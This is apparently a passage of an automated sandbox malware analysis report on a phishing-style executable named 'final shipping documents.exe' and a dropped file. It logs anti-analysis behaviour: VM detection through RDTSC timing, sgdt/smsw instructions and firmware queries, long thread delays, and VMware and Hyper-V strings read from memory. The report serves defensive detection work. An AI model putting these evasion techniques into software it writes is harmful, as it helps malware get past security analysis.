Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: final shipping documents.exe PID: 3628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GcrdXwPgmZ.exe PID: 6664, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\explorer.exe

System information queried: FirmwareTableInformation

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFB2CED0774
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFB2CECD8A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\mstsc.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\mstsc.exe	API/Special instruction interceptor: Address: 7FFB2CED0774
Source: C:\Windows\SysWOW64\mstsc.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\mstsc.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\mstsc.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\mstsc.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\mstsc.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\mstsc.exe	API/Special instruction interceptor: Address: 7FFB2CECD8A4
Source: C:\Windows\SysWOW64\mstsc.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe	RDTSC instruction interceptor: First address: EA9904 second address: EA990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe	RDTSC instruction interceptor: First address: EA9B6E second address: EA9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 24E9904 second address: 24E990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 24E9B6E second address: 24E9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\final shipping documents.exe	Memory allocated: F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Memory allocated: 2C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Memory allocated: 4C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Memory allocated: 8C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Memory allocated: 9C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Memory allocated: 9E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Memory allocated: AE40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Memory allocated: 27D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Memory allocated: 2980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Memory allocated: 27F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Memory allocated: 8AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Memory allocated: 9AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Memory allocated: 9CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Memory allocated: ACD0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\explorer.exe

File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 9_2_00409AA0 rdtsc

9_2_00409AA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 15_2_0109648B sgdt fword ptr [ebx+63h]

15_2_0109648B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 15_2_0109648B smsw ebp

15_2_0109648B

Source: C:\Users\user\Desktop\final shipping documents.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6423	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 618	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6501	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 607	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1267	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 8684	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 876	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 869	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Window / User API: threadDelayed 9832

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API coverage: 1.6 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API coverage: 1.2 %

Source: C:\Users\user\Desktop\final shipping documents.exe TID: 2780	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5396	Thread sleep count: 6423 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2884	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5396	Thread sleep count: 618 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6200	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4412	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3812	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7736	Thread sleep count: 1267 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7736	Thread sleep time: -2534000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7736	Thread sleep count: 8684 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7736	Thread sleep time: -17368000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe TID: 7336	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe TID: 7584	Thread sleep count: 139 > 30
Source: C:\Windows\SysWOW64\mstsc.exe TID: 7584	Thread sleep time: -278000s >= -30000s
Source: C:\Windows\SysWOW64\mstsc.exe TID: 7584	Thread sleep count: 9832 > 30
Source: C:\Windows\SysWOW64\mstsc.exe TID: 7584	Thread sleep time: -19664000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\final shipping documents.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 0000000A.00000002.2454977385.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
Source: explorer.exe, 0000001A.00000002.3133392253.000000000C907000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}dll
Source: explorer.exe, 0000001A.00000002.2792625509.0000000001199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000>
Source: explorer.exe, 0000000A.00000002.2465635180.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000001A.00000003.2574704778.0000000009103000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
Source: explorer.exe, 0000000A.00000000.1505638874.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2465635180.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009362000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009362000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001A.00000003.2639101029.000000000CA3F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000000A.00000000.1479357808.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: explorer.exe, 0000001A.00000003.2652802233.000000000CB57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94
Source: explorer.exe, 0000001A.00000003.2627116787.00000000093D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: >>SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000001A.00000002.3133392253.000000000C907000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_
Source: explorer.exe, 0000000A.00000002.2465635180.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 0000000A.00000002.2465635180.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
Source: explorer.exe, 0000000A.00000003.2271883483.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
Source: explorer.exe, 0000001A.00000002.3133392253.000000000C907000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000001A.00000002.3123251512.00000000090B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00a
Source: explorer.exe, 0000001A.00000002.3133392253.000000000CA8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000000A.00000000.1479357808.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: explorer.exe, 0000001A.00000002.3133392253.000000000C907000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 0000001A.00000002.3133392253.000000000CA8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: explorer.exe, 0000000A.00000003.2273498189.000000000730A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000000A.00000000.1505638874.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2465635180.0000000008F27000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT`
Source: explorer.exe, 0000001A.00000002.3133392253.000000000CA8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\9507e
Source: explorer.exe, 0000000A.00000000.1479357808.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 0000000A.00000000.1479357808.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: explorer.exe, 0000001A.00000003.2652973217.000000000CB5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.1479357808.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: explorer.exe, 0000001A.00000002.3133392253.000000000C907000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000002.2454977385.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001A.00000003.2467118274.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.
Source: explorer.exe, 0000001A.00000002.3133392253.000000000CA8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000QYt
Source: explorer.exe, 0000001A.00000002.3133392253.000000000CA8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: explorer.exe, 0000001A.00000002.3133392253.000000000C907000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} it.
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009279000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.1479357808.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
